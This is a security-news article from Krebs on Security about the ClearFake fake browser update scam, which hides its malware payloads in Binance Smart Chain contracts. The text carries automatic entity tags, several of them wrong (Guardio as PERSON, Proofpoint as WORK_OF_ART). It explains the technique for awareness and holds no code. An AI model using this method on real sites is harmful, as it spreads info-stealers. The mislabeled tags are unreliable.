The Fake Browser Update Scam Gets a Makeover – Krebs on Security

By admin

One
CARDINAL

of the oldest malware tricks in the book — hacked websites claiming visitors need to update their Web browser before they can view any content — has roared back to life in

the past few months
DATE

. New research shows the attackers behind

one
CARDINAL

such scheme have developed an ingenious way of keeping their malware from being taken down by security experts or law enforcement: By hosting the malicious files on a decentralized, anonymous cryptocurrency blockchain.

In

August 2023
DATE

, security researcher

Randy McEoin
PERSON

blogged about a scam he dubbed

ClearFake
ORG

, which uses hacked

WordPress
ORG

sites to serve visitors with a page that claims you need to update your browser before you can view the content.

The fake browser alerts are specific to the browser you’re using, so if you’re surfing the Web with

Chrome
ORG

, for example, you’ll get a

Chrome
ORG

update prompt. Those who are fooled into clicking the update button will have a malicious file dropped on their system that tries to install an information stealing trojan.


Earlier this month
DATE

, researchers at the

Tel Aviv
GPE

-based security firm

Guardio
PERSON

said they tracked an updated version of the

ClearFake
ORG

scam that included an important evolution. Previously, the group had stored its malicious update files on

Cloudflare
ORG

,

Guardio
PERSON

said.

But when

Cloudflare
ORG

blocked those accounts the attackers began storing their malicious files as cryptocurrency transactions in the Binance Smart Chain (BSC), a technology designed to run decentralized apps and “smart contracts,” or coded agreements that execute actions automatically when certain conditions are met.


Nati Tal
PERSON

, head of security at

Guardio Labs
ORG

, the research unit at

Guardio
GPE

, said the malicious scripts stitched into hacked

WordPress
ORG

sites will create a new smart contract on the

BSC
ORG

Blockchain, starting with a unique, attacker-controlled blockchain address and a set of instructions that defines the contract’s functions and structure. When that contract is queried by a compromised website, it will return an obfuscated and malicious payload.

“These contracts offer innovative ways to build applications and processes,”

Tal
PERSON

wrote along with his

Guardio
PERSON

colleague

Oleg Zaytsev
PERSON

. “Due to the publicly accessible and unchangeable nature of the blockchain, code can be hosted ‘on-chain’ without the ability for a takedown.”


Tal
PERSON

said hosting malicious files on the Binance Smart Chain is ideal for attackers because retrieving the malicious contract is a cost-free operation that was originally designed for the purpose of debugging contract execution issues without any real-world impact.

“So you get a free, untracked, and robust way to get your data (the malicious payload) without leaving traces,”

Tal
PERSON

said.

In response to questions from

KrebsOnSecurity
ORG

,

the BNB Smart Chain
ORG

(

BSC
ORG

) said its team is aware of the malware abusing its blockchain, and is actively addressing the issue. The company said all addresses associated with the spread of the malware have been blacklisted, and that its technicians had developed a model to detect future smart contracts that use similar methods to host malicious scripts.

“This model is designed to proactively identify and mitigate potential threats before they can cause harm,” BNB Smart Chain wrote. “The team is committed to ongoing monitoring of addresses that are involved in spreading malware scripts on the

BSC
LOC

. To enhance their efforts, the tech team is working on linking identified addresses that spread malicious scripts to centralized KYC [Know Your Customer] information, when possible.”


Guardio
PERSON

says the crooks behind the

BSC
ORG

malware scheme are using the same malicious code as the attackers that

McEoin
PERSON

wrote about in

August
DATE

, and are likely the same group. But a report published

today
DATE

by email security firm

Proofpoint
ORG

says the company is currently tracking

at least four
CARDINAL

distinct threat actor groups that use fake browser updates to distribute malware.

Proofpoint notes that the core group behind the fake browser update scheme has been using this technique to spread malware for

the past five years
DATE

, primarily because the approach still works well.

“Fake browser update lures are effective because threat actors are using an end-user’s security training against them,”

Proofpoint
WORK_OF_ART

’s

Dusty Miller
PERSON

wrote. “In security awareness training, users are told to only accept updates or click on links from known and trusted sites, or individuals, and to verify sites are legitimate. The fake browser updates abuse this training because they compromise trusted sites and use

JavaScript
ORG

requests to quietly make checks in the background and overwrite the existing website with a browser update lure. To an end user, it still appears to be the same website they were intending to visit and is now asking them to update their browser.”


More than a decade ago
DATE

, this site published

Krebs
PERSON

’s

Three Rules for Online Safety
ORG

, of which Rule #

1
MONEY

was, “If you didn’t go looking for it, don’t install it.” It’s nice to know that this technology-agnostic approach to online safety remains just as relevant

today
DATE

.